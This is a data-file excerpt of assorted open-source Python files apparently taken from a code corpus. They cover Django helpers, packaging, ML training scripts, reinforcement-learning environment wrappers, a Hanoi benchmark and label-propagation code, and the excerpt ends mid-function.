id (string, lengths 1-265) | text (string, lengths 6-5.19M) | dataset_id (string, 7 classes)
---|---|---|
17797 | <reponame>chop-dbhi/biorepo-portal<filename>brp/formutils.py
from django import template
from django.forms import widgets
register = template.Library()
@register.inclusion_tag('formfield.html')
def formfield(field):
widget = field.field.widget
type_ = None
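# Map the bound field's widget class to a simple type string consumed by the formfield.html template.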
if isinstance(widget, widgets.Input):
type_ = 'input'
elif isinstance(widget, widgets.Textarea):
type_ = 'textarea'
elif isinstance(widget, widgets.Select):
type_ = 'select'
elif isinstance(widget, widgets.CheckboxInput):
type_ = 'checkbox'
elif isinstance(widget, widgets.RadioInput):
type_ = 'radio'
return {'field': field, 'form': field.form, 'type': type_}
| StarcoderdataPython |
172233 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
# from distutils.command.install import INSTALL_SCHEMES
from setuptools import setup, find_packages
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("CHANGELOG.rst") as history_file:
history = history_file.read()
setup_requirements = [
"pytest-runner",
# TODO(jawahar273): put setup requirements
# (distutils extensions, etc.) here
]
def parse_requirements(filename):
""" load requirements from a pip requirements file
refer: `link <https://stackoverflow.com/questions/25192794/no-module-named-pip-req/>`_
"""
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
# read the requirements_*.txt files to collect the
# extras_require dependencies.
extras_require = {
"ujson": parse_requirements("requirements_ujson.txt"),
"huey": parse_requirements("requirements_huey.txt"),
"xxhash": parse_requirements("requirements_xxhash.txt"),
}
setup(
name="pntl",
version="0.3.6",
description=(
"used to interface with Senna and" " stanford-parser.jar for dependency parsing"
),
long_description="\n\n" + readme + "\n\n" + history,
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/jawahar273/practNLPTools-lite",
packages=find_packages(include=["pntl.*"]),
entry_points={"console_scripts": ["pntl=pntl.cli:user_test"]},
include_package_data=True,
install_requires=parse_requirements("requirements.txt"),
license="MIT license",
zip_safe=False,
keywords="practnlptools-lite senna python pntl".split(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Information Analysis",
],
test_suite="tests",
tests_require=parse_requirements("requirements_dev.txt"),
setup_requires=setup_requirements,
extras_require=extras_require,
)
| StarcoderdataPython |
1729095 | import sys
sys.path.append('..')
from mtevi.mtevi import *
from mtevi.utils import *
import numpy as np
import torch
import argparse
import os
import math
from BayesianDTI.utils import *
from torch.utils.data import Dataset, DataLoader
from BayesianDTI.datahelper import *
from BayesianDTI.model import *
from BayesianDTI.predictor import *
from scipy.stats import t
from BayesianDTI.utils import confidence_interval
import matplotlib.pyplot as plt
import matplotlib
matplotlib.style.use('ggplot')
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fold_num", type=int,
help="Fold number. It must be one of the {0,1,2,3,4}.")
parser.add_argument("-e", "--epochs", type=int, default=200,
help="Number of epochs.")
parser.add_argument("-o", "--output",
help="The output directory.")
parser.add_argument("--type", default='None',
help="Davis or Kiba; dataset select.")
parser.add_argument("--model",
help="The trained baseline model. If given, keep train the model.")
parser.add_argument("--abl", action='store_true',
help="Use the vanilla MSE")
parser.add_argument("--evi", action='store_true',
help="Use the vanilla evidential network")
parser.add_argument("--reg", type=float, default=0.0001,
help="Coefficient of evidential regularization")
parser.add_argument("--l2", type=float, default=0.0001,
help="Coefficient of L2 regularization")
parser.add_argument("--cuda", type=int, default=0, help="cuda device number")
args = parser.parse_args()
torch.cuda.set_device(args.cuda)
args.type = args.type.lower()
dir = args.output
print("Arguments: ########################")
print('\n'.join(f'{k}={v}' for k, v in vars(args).items()))
print("###################################")
try:
os.mkdir(args.output)
except FileExistsError:
print("The output directory {} already exists.".format(args.output))
#######################################################################
### Load data
FOLD_NUM = int(args.fold_num) # {0,1,2,3,4}
class DataSetting:
def __init__(self):
self.dataset_path = 'data/{}/'.format(args.type)
self.problem_type = '1'
self.is_log = False if args.type == 'kiba' else True
data_setting = DataSetting()
dataset = DataSet(data_setting.dataset_path,
1000 if args.type == 'kiba' else 1200,
100 if args.type == 'kiba' else 85) ## KIBA (1000,100) DAVIS (1200, 85)
smiles, proteins, Y = dataset.parse_data(data_setting)
test_fold, train_folds = dataset.read_sets(data_setting)
label_row_inds, label_col_inds = np.where(np.isnan(Y)==False)
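# The fold files hold flat indices into the observed (non-NaN) drug/protein pairs of Y.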
test_drug_indices = label_row_inds[test_fold]
test_protein_indices = label_col_inds[test_fold]
train_fold_sum = []
for i in range(5):
if i != FOLD_NUM:
train_fold_sum += train_folds[i]
train_drug_indices = label_row_inds[train_fold_sum]
train_protein_indices = label_col_inds[train_fold_sum]
valid_drug_indices = label_row_inds[train_folds[FOLD_NUM]]
valid_protein_indices = label_col_inds[train_folds[FOLD_NUM]]
dti_dataset = DTIDataset(smiles, proteins, Y, train_drug_indices, train_protein_indices)
valid_dti_dataset = DTIDataset(smiles, proteins, Y, valid_drug_indices, valid_protein_indices)
test_dti_dataset = DTIDataset(smiles, proteins, Y, test_drug_indices, test_protein_indices)
dataloader = DataLoader(dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
valid_dataloader = DataLoader(valid_dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
test_dataloader = DataLoader(test_dti_dataset, batch_size=256, shuffle=True, collate_fn=collate_dataset)#, pin_memory=True)
##########################################################################
### Define models
device = 'cuda:{}'.format(args.cuda)
dti_model = EvidentialDeepDTA(dropout=True).to(device)
objective_fn = EvidentialnetMarginalLikelihood().to(device)
objective_mse = torch.nn.MSELoss()
regularizer = EvidenceRegularizer(factor=args.reg).to(device)
opt = torch.optim.Adam(dti_model.parameters(), lr=0.001, weight_decay=args.l2)
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer=opt, lr_lambda=lambda epoch: 0.99 ** epoch,
last_epoch=-1,
verbose=False)
total_valid_loss = 0.
total_valid_nll = 0.
total_nll = 0.
train_nll_history = []
valid_loss_history = []
valid_nll_history = []
##########################################################################
### Training
a_history = []
best_nll = 10000
for epoch in range(args.epochs):
dti_model.train()
for d, p, y in dataloader:
y = y.unsqueeze(1).to(device)
gamma, nu, alpha, beta = dti_model(d.to(device), p.to(device))
opt.zero_grad()
###############################################################
#### NLL training
loss = objective_fn(gamma, nu, alpha, beta, y)
total_nll += loss.item()
loss += regularizer(gamma, nu, alpha, beta, y)
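# Unless --evi (pure evidential training) is set, also add an MSE-style term (plain or evidence-modified).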
if not args.evi:
if args.abl:
mse = objective_mse(gamma, y)
else:
mse = modified_mse(gamma, nu, alpha, beta, y)
loss += mse.mean()
loss.backward()
###############################################################
opt.step()
scheduler.step()
dti_model.eval()
for d_v, p_v, y_v in valid_dataloader:
y_v = y_v.unsqueeze(1).to(device)
gamma, nu, alpha, beta = dti_model(d_v.to(device), p_v.to(device))
nll_v = objective_fn(gamma,
nu,
alpha,
beta,
y_v)
valid_nll_history.append(nll_v.item())
total_valid_nll += nll_v.item()
nll_v = objective_mse(gamma, y_v).mean()
valid_loss_history.append(nll_v.item())
total_valid_loss += nll_v.item()
train_nll = total_nll/len(dataloader)
valid_nll = total_valid_nll/len(valid_dataloader)
valid_loss = total_valid_loss/len(valid_dataloader)
if math.isnan(valid_nll):
break
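# Checkpoint the model whenever the validation NLL improves.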
if best_nll >= valid_nll:
torch.save(dti_model, dir + '/dti_model_best.model')
best_nll = valid_nll
print("Epoch {}: Train NLL [{:.5f}] Val MSE [{:.5f}] Val NLL [{:.5f}]".format(
epoch+1, train_nll, valid_loss, valid_nll))
total_nll = 0.
total_valid_loss = 0.
total_valid_nll = 0.
##########################################################################
fig = plt.figure(figsize=(15,5))
plt.plot(valid_loss_history, label="MSE")
plt.plot(valid_nll_history, label="NLL")
plt.title("Validate loss")
plt.xlabel("Validate steps")
plt.legend(facecolor='white', edgecolor='black')
plt.tight_layout()
plt.savefig(dir + "/MultitaskLoss.png")
##########################################################################
### Evaluation
import torch.distributions.studentT as studentT
predictor = EviNetDTIPredictor()
eval_model = torch.load(dir + '/dti_model_best.model').to(device)
mu_t, std_t, mu_Y_t, freedom_t = predictor(test_dataloader, eval_model)
total_t = std_t['total']
epistemic_t = std_t['epistemic']
aleatoric_t = std_t['aleatoric']
predictive_entropy = studentT.StudentT(torch.from_numpy(freedom_t), scale=torch.from_numpy(total_t)).entropy()
##########################################################################
from BayesianDTI.utils import plot_predictions
plot_predictions(mu_Y_t, mu_t, total_t, title="Mean prediction test with total uncertainty",
sample_num=freedom_t, savefig=dir + "/total_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, aleatoric_t, title="Mean prediction test with aleatoric uncertainty",
sample_num=None, savefig=dir + "/aleatoric_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, epistemic_t, title="Mean prediction test with epistemic uncertainty",
sample_num=None, savefig=dir + "/epistemic_uncertainty.png")
plot_predictions(mu_Y_t, mu_t, predictive_entropy, title="Mean prediction test with predictive entropy",
sample_num=freedom_t, savefig=dir + "/total_uncertainty_colored.png", rep_conf='color')
##########################################################################
from BayesianDTI.utils import evaluate_model
import json
eval_results = evaluate_model(mu_Y_t, mu_t, total_t, sample_num=freedom_t)
eval_json = json.dumps(eval_results, indent=4)
print(eval_json)
with open(dir + '/eval_result_prior.json','w') as outfile:
json.dump(eval_results, outfile)
| StarcoderdataPython |
16123 | import os
import sys
import posthoganalytics
from django.apps import AppConfig
from django.conf import settings
from posthog.utils import get_git_branch, get_git_commit, get_machine_id
from posthog.version import VERSION
class PostHogConfig(AppConfig):
name = "posthog"
verbose_name = "PostHog"
def ready(self):
posthoganalytics.api_key = "<KEY>"
posthoganalytics.personal_api_key = os.environ.get("POSTHOG_PERSONAL_API_KEY")
# Skip plugin sync in manage.py scripts and in tests
# (the database tables might not yet be created)
if (
not settings.TEST
and not "makemigrations" in sys.argv
and not "migrate" in sys.argv
and not "manage.py" in " ".join(sys.argv)
and not "/mypy" in sys.argv[0]
):
from posthog.plugins import sync_plugin_config
# syncs posthog.json['plugins'] and the Plugin/PluginConfig models
sync_plugin_config()
if settings.DEBUG:
# log development server launch to posthog
if os.getenv("RUN_MAIN") == "true":
posthoganalytics.capture(
get_machine_id(),
"development server launched",
{"posthog_version": VERSION, "git_rev": get_git_commit(), "git_branch": get_git_branch(),},
)
posthoganalytics.disabled = True
elif settings.TEST or os.environ.get("OPT_OUT_CAPTURE"):
posthoganalytics.disabled = True
| StarcoderdataPython |
113522 | <filename>src/day2.py
# Advent of Code 2021, Day 2
# (c) blu3r4y
from aocd.models import Puzzle
from dotmap import DotMap
from funcy import print_calls
from parse import parse
@print_calls
def part1(instructions):
hor, dep = 0, 0
for e in instructions:
if e.dir == "forward":
hor += e.num
elif e.dir == "down":
dep += e.num
elif e.dir == "up":
dep -= e.num
return hor * dep
@print_calls
def part2(instructions):
hor, dep, aim = 0, 0, 0
for e in instructions:
if e.dir == "forward":
hor += e.num
dep += aim * e.num
elif e.dir == "down":
aim += e.num
elif e.dir == "up":
aim -= e.num
return hor * dep
def load(data):
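# Each line like "forward 5" is parsed into a DotMap with .dir and .num fields.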
return [DotMap(parse("{dir:l} {num:d}", line).named) for line in data.split("\n")]
if __name__ == "__main__":
puzzle = Puzzle(year=2021, day=2)
ans1 = part1(load(puzzle.input_data))
# puzzle.answer_a = ans1
ans2 = part2(load(puzzle.input_data))
# puzzle.answer_b = ans2
| StarcoderdataPython |
1604379 | <gh_stars>0
import json
from random import randint
from time import sleep
import uuid
from python_liftbridge import Lift, Message, Stream, ErrStreamExists
def my_random_string(string_length=10):
"""Returns a random string of length string_length."""
random = str(uuid.uuid4())
random = random.upper()
random = random.replace("-", "")
return random[0:string_length]
# Create a Liftbridge client.
client = Lift(ip_address='localhost:9292', timeout=5)
# Create a stream attached to the NATS subject "test3".
try:
client.create_stream(
Stream(subject='test3', name='test4-stream', replication_factor=1))
except ErrStreamExists:
print('This stream already exists!')
# Publish messages to the "test4-stream" stream in a loop.
while True:
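# Each iteration publishes one JSON message, then sleeps for 10-100 microseconds.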
msg = {"event_triggered": my_random_string(5)}
client.publish(Message(value=json.dumps(msg), stream='test4-stream'))
random_us = randint(10, 100) / 1000000.0
sleep(random_us)
| StarcoderdataPython |
31750 | <gh_stars>0
# This code is based on the SOM class library.
#
# Copyright (c) 2001-2021 see AUTHORS.md file
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from benchmark import Benchmark
class _TowersDisk:
def __init__(self, size):
self.size = size
self.next = None
class Towers(Benchmark):
def __init__(self):
self._piles = None
self._moves_done = 0
def _push_disk(self, disk, pile):
top = self._piles[pile]
if top is not None and disk.size >= top.size:
raise Exception("Cannot put a big disk on a smaller one")
disk.next = top
self._piles[pile] = disk
def _pop_disk_from(self, pile):
top = self._piles[pile]
if top is None:
raise Exception("Attempting to remove a disk from an empty pile")
self._piles[pile] = top.next
top.next = None
return top
def _move_top_disk(self, from_pile, to_pile):
self._push_disk(self._pop_disk_from(from_pile), to_pile)
self._moves_done += 1
def _build_tower_at(self, pile, disks):
for i in range(disks, -1, -1):
self._push_disk(_TowersDisk(i), pile)
def _move_disks(self, disks, from_pile, to_pile):
if disks == 1:
self._move_top_disk(from_pile, to_pile)
else:
other_pile = (3 - from_pile) - to_pile
self._move_disks(disks - 1, from_pile, other_pile)
self._move_top_disk(from_pile, to_pile)
self._move_disks(disks - 1, other_pile, to_pile)
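# Moving n disks takes 2**n - 1 moves, so the 13-disk run below yields 8191 (checked by verify_result).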
def benchmark(self):
self._piles = [None, None, None]
self._build_tower_at(0, 13)
self._moves_done = 0
self._move_disks(13, 0, 1)
return self._moves_done
def verify_result(self, result):
return result == 8191
| StarcoderdataPython |
1702192 | from tanim.utils.color import Color
from tanim.utils.config_ops import digest_config
from tanim.core.mobject.vectorized_mobject import VGroup
from tanim.core.mobject.vectorized_mobject import VMobject
from tanim.extention.mobject.geometry import Line
from tanim.extention.mobject.geometry import Rectangle
import tanim.utils.constants as consts
class SurroundingRectangle(Rectangle):
CONFIG = {
"color": Color('YELLOW'),
"buff": consts.SMALL_BUFF,
}
def __init__(self, mobject, **kwargs):
digest_config(self, kwargs)
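# Size the rectangle to the target mobject plus a buff margin on each side.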
kwargs["width"] = mobject.get_width() + 2 * self.buff
kwargs["height"] = mobject.get_height() + 2 * self.buff
Rectangle.__init__(self, **kwargs)
self.move_to(mobject)
class BackgroundRectangle(SurroundingRectangle):
CONFIG = {
"color": Color('BLACK'),
"stroke_width": 0,
"stroke_opacity": 0,
"fill_opacity": 0.75
}
def __init__(self, mobject, **kwargs):
SurroundingRectangle.__init__(self, mobject, **kwargs)
self.original_fill_opacity = self.fill_opacity
def pointwise_become_partial(self, mobject, a, b):
self.set_fill(opacity=b * self.original_fill_opacity)
return self
def set_style_data(self,
stroke_color=None,
stroke_width=None,
fill_color=None,
fill_opacity=None,
family=True
):
# Unchangeable style, except for fill_opacity
VMobject.set_style_data(
self,
stroke_color=Color('BLACK'),
stroke_width=0,
fill_color=Color('BLACK'),
fill_opacity=fill_opacity
)
return self
def get_fill_color(self):
return Color(self.color)
class Cross(VGroup):
CONFIG = {
"stroke_color": Color('RED'),
"stroke_width": 6,
}
def __init__(self, mobject, **kwargs):
VGroup.__init__(self,
Line(consts.UP + consts.LEFT, consts.DOWN + consts.RIGHT),
Line(consts.UP + consts.RIGHT, consts.DOWN + consts.LEFT),
)
self.replace(mobject, stretch=True)
self.set_stroke(self.stroke_color, self.stroke_width)
class Underline(Line):
CONFIG = {
"buff": consts.SMALL_BUFF,
}
def __init__(self, mobject, **kwargs):
super().__init__(consts.LEFT, consts.RIGHT, **kwargs)
self.match_width(mobject)
self.next_to(mobject, consts.DOWN, buff=self.buff)
| StarcoderdataPython |
3286973 | import abc
from collections import OrderedDict
import numpy as np
from gym.spaces import Box
from rlkit.core.eval_util import create_stats_ordered_dict
from rlkit.envs.wrappers import ProxyEnv
from rlkit.core.serializable import Serializable
from rlkit.core import logger as default_logger
class MultitaskEnv(object, metaclass=abc.ABCMeta):
"""
An environment with a task that can be specified with a goal.
To change the goal, you need to explicitly call
```
goal = env.sample_goal_for_rollout()
env.set_goal(goal)
env.reset() # optional, but probably for the best
```
If you want to append the goal to the state, do this:
```
env = MyMultitaskEnv()
env = MultitaskToFlatEnv(env)
```
The above code will also make the goal change at every reset.
See MultitaskToFlatEnv for more detail.
If you want to change the goal at every call to reset(), but you do not
want the goal to be appended to the state, do this:
```
env = MyMultitaskEnv()
env = MultitaskEnvToSilentMultitaskEnv(env)
```
See `MultitaskEnvToSilentMultitaskEnv` for more detail.
"""
def __init__(self, distance_metric_order=1, goal_dim_weights=None):
self.multitask_goal = np.zeros(self.goal_dim)
if goal_dim_weights is None:
self.goal_dim_weights = np.ones(self.goal_dim)
else:
self.goal_dim_weights = np.array(goal_dim_weights)
self.distance_metric_order = distance_metric_order
"""
New environments should implement these three functions
"""
@property
@abc.abstractmethod
def goal_dim(self) -> int:
"""
:return: int, dimension of goal vector
"""
pass
@abc.abstractmethod
def sample_goals(self, batch_size):
pass
@abc.abstractmethod
def convert_obs_to_goals(self, obs):
"""
Convert a raw environment observation into a goal (if possible).
"""
pass
"""
Helper functions you probably don't need to override.
"""
def sample_goal_for_rollout(self):
"""
These goals are fed to a policy when the policy wants to actually
do rollouts.
:return:
"""
goal = self.sample_goals(1)[0]
return self.modify_goal_for_rollout(goal)
def convert_ob_to_goal(self, ob):
"""
Convert a raw environment observation into a goal (if possible).
This observation should NOT include the goal.
"""
if isinstance(ob, np.ndarray):
return self.convert_obs_to_goals(
np.expand_dims(ob, 0)
)[0]
else:
return self.convert_obs_to_goals_pytorch(
ob.unsqueeze(0)
)[0]
def compute_reward(self, ob, action, next_ob, goal):
return self.compute_rewards(
ob[None], action[None], next_ob[None], goal[None]
)
"""
Check out these default functions below! You may want to override them.
"""
def set_goal(self, goal):
self.multitask_goal = goal
def compute_rewards(self, obs, actions, next_obs, goals):
return - np.linalg.norm(
self.convert_obs_to_goals(next_obs) - goals,
axis=1,
keepdims=True,
ord=self.distance_metric_order,
)
def convert_obs_to_goals_pytorch(self, obs):
"""
PyTorch version of `convert_obs_to_goals`.
"""
return self.convert_obs_to_goals(obs)
def modify_goal_for_rollout(self, goal):
"""
Modify a goal so that it's appropriate for doing a rollout.
Common use case: zero out the goal velocities.
:param goal:
:return:
"""
return goal
def log_diagnostics(self, paths, logger=default_logger):
list_of_goals = _extract_list_of_goals(paths)
if list_of_goals is None:
return
final_differences = []
for path, goals in zip(paths, list_of_goals):
reached = self.convert_ob_to_goal(path['next_observations'][-1])
final_differences.append(reached - goals[-1])
statistics = OrderedDict()
goals = np.vstack(list_of_goals)
observations = np.vstack([path['observations'] for path in paths])
next_observations = np.vstack([path['next_observations'] for path in paths])
actions = np.vstack([path['actions'] for path in paths])
for order in [1, 2]:
final_distances = np.linalg.norm(
np.array(final_differences),
axis=1,
ord=order,
)
goal_distances = np.linalg.norm(
self.convert_obs_to_goals(observations) - np.vstack(goals),
axis=1,
ord=order,
)
statistics.update(create_stats_ordered_dict(
'Multitask L{} distance to goal'.format(order),
goal_distances,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Multitask Final L{} distance to goal'.format(order),
final_distances,
always_show_all_stats=True,
))
rewards = self.compute_rewards(
observations,
actions,
next_observations,
goals,
)
statistics.update(create_stats_ordered_dict(
'Multitask Env Rewards', rewards,
))
for key, value in statistics.items():
logger.record_tabular(key, value)
"""
Optional functions to implement, since most of my code doesn't use these
any more.
"""
def cost_fn(self, states, actions, next_states):
"""
This is added for model-based code. This is COST not reward.
So lower is better.
:param states: (BATCH_SIZE x state_dim) numpy array
:param actions: (BATCH_SIZE x action_dim) numpy array
:param next_states: (BATCH_SIZE x state_dim) numpy array
:return: (BATCH_SIZE, ) numpy array
"""
if len(next_states.shape) == 1:
next_states = np.expand_dims(next_states, 0)
actual = self.convert_obs_to_goals(next_states)
desired = self.multitask_goal * np.ones_like(actual)
diff = actual - desired
diff *= self.goal_dim_weights
return (diff**2).sum(1)
def _extract_list_of_goals(paths):
"""
Return list of goals. Each element in list is an array of goals and
correspond to the goal from different paths.
Returns None if it's not possible to extract goals from the paths.
:param paths:
:return:
"""
if len(paths) == 0:
return None
if 'goals' in paths[0]:
return [path['goals'] for path in paths]
if 'env_infos' in paths[0]:
env_infos = paths[0]['env_infos']
if isinstance(env_infos, dict): # rllab style paths
return [path['env_infos']['goal'] for path in paths]
elif 'goal' in env_infos[0]:
return [
[info['goal'] for info in path['env_infos']]
for path in paths
]
return None
class MultitaskToFlatEnv(ProxyEnv, Serializable):
"""
This environment tasks a multitask environment and appends the goal to
the state.
"""
def __init__(
self,
env: MultitaskEnv,
give_goal_difference=False,
):
# self._wrapped_env needs to be called first because
# Serializable.quick_init calls getattr, on this class. And the
# implementation of getattr (see below) calls self._wrapped_env.
# Without setting this first, the call to self._wrapped_env would call
# getattr again (since it's not set yet) and therefore loop forever.
self._wrapped_env = env
# Or else serialization gets delegated to the wrapped_env. Serialize
# this env separately from the wrapped_env.
self._serializable_initialized = False
self._wrapped_obs_dim = env.observation_space.low.size
self.give_goal_difference = give_goal_difference
Serializable.quick_init(self, locals())
ProxyEnv.__init__(self, env)
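# Extend the observation bounds so the appended goal vector stays inside the Box space.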
wrapped_low = self.observation_space.low
low = np.hstack((
wrapped_low,
min(wrapped_low) * np.ones(self._wrapped_env.goal_dim)
))
wrapped_high = self.observation_space.high
high = np.hstack((
wrapped_high,
max(wrapped_high) * np.ones(self._wrapped_env.goal_dim)
))
self.observation_space = Box(low, high)
def step(self, action):
ob, reward, done, info_dict = self._wrapped_env.step(action)
new_ob = self._add_goal_to_observation(ob)
return new_ob, reward, done, info_dict
def reset(self):
self._wrapped_env.set_goal(self._wrapped_env.sample_goal_for_rollout())
ob = super().reset()
new_ob = self._add_goal_to_observation(ob)
return new_ob
def log_diagnostics(self, paths, logger=default_logger):
for path in paths:
path['observations'] = (
path['observations'][:, :-self._wrapped_env.goal_dim]
)
path['next_observations'] = (
path['next_observations'][:, :-self._wrapped_env.goal_dim]
)
return self._wrapped_env.log_diagnostics(paths, logger=default_logger)
def _add_goal_to_observation(self, ob):
if self.give_goal_difference:
goal_difference = (
self._wrapped_env.multitask_goal
- self._wrapped_env.convert_ob_to_goal(ob)
)
return np.hstack((ob, goal_difference))
else:
return np.hstack((ob, self._wrapped_env.multitask_goal))
def cost_fn(self, states, actions, next_states):
if len(next_states.shape) == 1:
states = states[None]
actions = actions[None]
next_states = next_states[None]
unwrapped_states = states[:, :self._wrapped_obs_dim]
unwrapped_next_states = next_states[:, :self._wrapped_obs_dim]
return self._wrapped_env.cost_fn(
unwrapped_states,
actions,
unwrapped_next_states,
)
class MultitaskEnvToSilentMultitaskEnv(ProxyEnv, Serializable):
"""
Normally, reset() on a multitask env doesn't change the goal.
Now, reset will silently change the goal.
"""
def reset(self):
self._wrapped_env.set_goal(self._wrapped_env.sample_goal_for_rollout())
return super().reset()
def cost_fn(self, states, actions, next_states):
return self._wrapped_env.cost_fn(
states,
actions,
next_states,
)
def sample_goal_for_rollout(self):
return self._wrapped_env.sample_goal_for_rollout()
def sample_goals(self, batch_size):
return self._wrapped_env.sample_goals(batch_size)
def sample_states(self, batch_size):
return self._wrapped_env.sample_states(batch_size)
def convert_ob_to_goal(self, ob):
return self._wrapped_env.convert_ob_to_goal(ob)
def convert_obs_to_goals(self, obs):
return self._wrapped_env.convert_obs_to_goals(obs)
@property
def multitask_goal(self):
return self._wrapped_env.multitask_goal
def joints_to_full_state(self, *args, **kwargs):
return self._wrapped_env.joints_to_full_state(*args, **kwargs)
| StarcoderdataPython |
1731433 | from .explore_handlers import *
| StarcoderdataPython |
1767204 | <reponame>ipattarapong/dbnd<filename>plugins/dbnd-docker/src/dbnd_docker/docker_ctrl.py
from dbnd._core.task_run.task_run_ctrl import TaskRunCtrl
class DockerRunCtrl(TaskRunCtrl):
def docker_run(self):
pass
def on_kill(self):
pass
| StarcoderdataPython |
15206 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time: 2020/5/14 20:41
# @Author: Mecthew
import time
import numpy as np
import pandas as pd
import scipy
from sklearn.svm import LinearSVC
from sklearn.linear_model import logistic
from sklearn.calibration import CalibratedClassifierCV
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import OneHotEncoder
import scipy.sparse as sp
from utils.logger import get_logger
logger = get_logger("INFO")
class SVM:
def __init__(self, **kwargs):
self.name = "SVM"
self._model = CalibratedClassifierCV(LinearSVC(C=1.0, max_iter=500, class_weight=None, random_state=666))
def fit(self, x_train, y_train):
self._model.fit(x_train, y_train)
def predict(self, x_test):
return self._model.predict_proba(x_test)
class LR:
def __init__(self, **kwargs):
self.name = "LR"
self._model = logistic.LogisticRegression(C=1.0, solver="liblinear", multi_class="auto",
class_weight=None, max_iter=100, random_state=666)
def fit(self, x_train, y_train):
self._model.fit(x_train, y_train)
def predict(self, x_test):
return self._model.predict_proba(x_test)
def prepredict(graph_df, train_indices, use_valid, use_ohe=False):
t1 = time.time()
fea_table = graph_df['fea_table'].set_index(keys="node_index")
train_indices = train_indices
if use_valid:
valid_indices = list(set(graph_df['train_indices']) - set(train_indices))
test_indices = graph_df['test_indices'] + valid_indices
else:
test_indices = graph_df['test_indices']
train_label = graph_df['train_label'].set_index('node_index').loc[train_indices][['label']]
x_train, y_train = fea_table.loc[train_indices].to_numpy(), train_label.to_numpy()
x_test = fea_table.loc[test_indices].to_numpy()
lr = LR()
lr.fit(x_train, y_train)
if use_ohe:
ohe = OneHotEncoder(handle_unknown="ignore").fit(y_train.reshape(-1, 1))
x_train_feat, x_test_feat = ohe.transform(np.argmax(lr.predict(x_train), axis=1).reshape(-1, 1)).toarray(), \
ohe.transform(np.argmax(lr.predict(x_test), axis=1).reshape(-1, 1)).toarray()
else:
x_train_feat, x_test_feat = lr.predict(x_train), \
lr.predict(x_test)
pre_feat = np.concatenate([x_train_feat, x_test_feat], axis=0)
total_indices = np.concatenate([train_indices, test_indices], axis=0)
train_predict = np.argmax(x_train_feat, axis=1)
train_acc = accuracy_score(y_true=y_train, y_pred=train_predict)
t2 = time.time()
logger.info("Time cost for training {}: {}s, train acc {}".format(lr.name, t2-t1, train_acc))
return pd.DataFrame(data=pre_feat, index=total_indices)
def lpa_predict(graph_df, n_class, train_indices, use_valid, max_iter=100, tol=1e-3, use_ohe=False):
t1 = time.time()
train_indices = train_indices
if use_valid:
valid_indices = list(set(graph_df['train_indices']) - set(train_indices))
test_indices = graph_df['test_indices'] + valid_indices
else:
test_indices = graph_df['test_indices']
train_label = graph_df['train_label'].set_index('node_index').loc[train_indices][['label']].to_numpy()
print("Train label shape {}".format(train_label.shape))
train_label = train_label.reshape(-1)
edges = graph_df['edge_file'][['src_idx', 'dst_idx', 'edge_weight']].to_numpy()
edge_index = edges[:, :2].astype(np.int).transpose() # transpose to (2, num_edges)
edge_weight = edges[:, 2].astype(np.float)
num_nodes = len(train_indices) + len(test_indices)
t2 = time.time()
total_indices = np.concatenate([train_indices, test_indices], axis=0)
adj = sp.coo_matrix((edge_weight, edge_index), shape=(num_nodes, num_nodes)).tocsr()
adj = adj[total_indices] # reorder
adj = adj[:, total_indices]
t3 = time.time()
logger.debug("Time cost for transform adj {}s".format(t3 - t2))
row_sum = np.array(adj.sum(axis=1), dtype=np.float)
d_inv = np.power(row_sum, -1).flatten()
d_inv[np.isinf(d_inv)] = 0.
normal_adj = sp.diags(d_inv).dot(adj).tocsr().transpose()
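# Split the row-normalized adjacency into labeled/unlabeled blocks used by the propagation updates.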
Pll = normal_adj[:len(train_indices), :len(train_indices)].copy()
Plu = normal_adj[:len(train_indices), len(train_indices):].copy()
Pul = normal_adj[len(train_indices):, :len(train_indices)].copy()
Puu = normal_adj[len(train_indices):, len(train_indices):].copy()
label_mat = np.eye(n_class)[train_label]
label_mat_prob = label_mat.copy()
print("Pul shape {}, label_mat shape {}".format(Pul.shape, label_mat_prob.shape))
Pul_dot_lable_mat = Pul.dot(label_mat)
unlabel_mat = np.zeros(shape=(len(test_indices), n_class))
iter, changed = 0, np.inf
t4 = time.time()
logger.debug("Time cost for prepare matrix {}s".format(t4-t3))
while iter < max_iter and changed > tol:
if iter % 10 == 0:
logger.debug("---> Iteration %d/%d, changed: %f" % (iter, max_iter, changed))
iter += 1
pre_unlabel_mat = unlabel_mat
unlabel_mat = Puu.dot(unlabel_mat) + Pul_dot_lable_mat
label_mat_prob = Pll.dot(label_mat_prob) + Plu.dot(pre_unlabel_mat)
changed = np.abs(pre_unlabel_mat - unlabel_mat).sum()
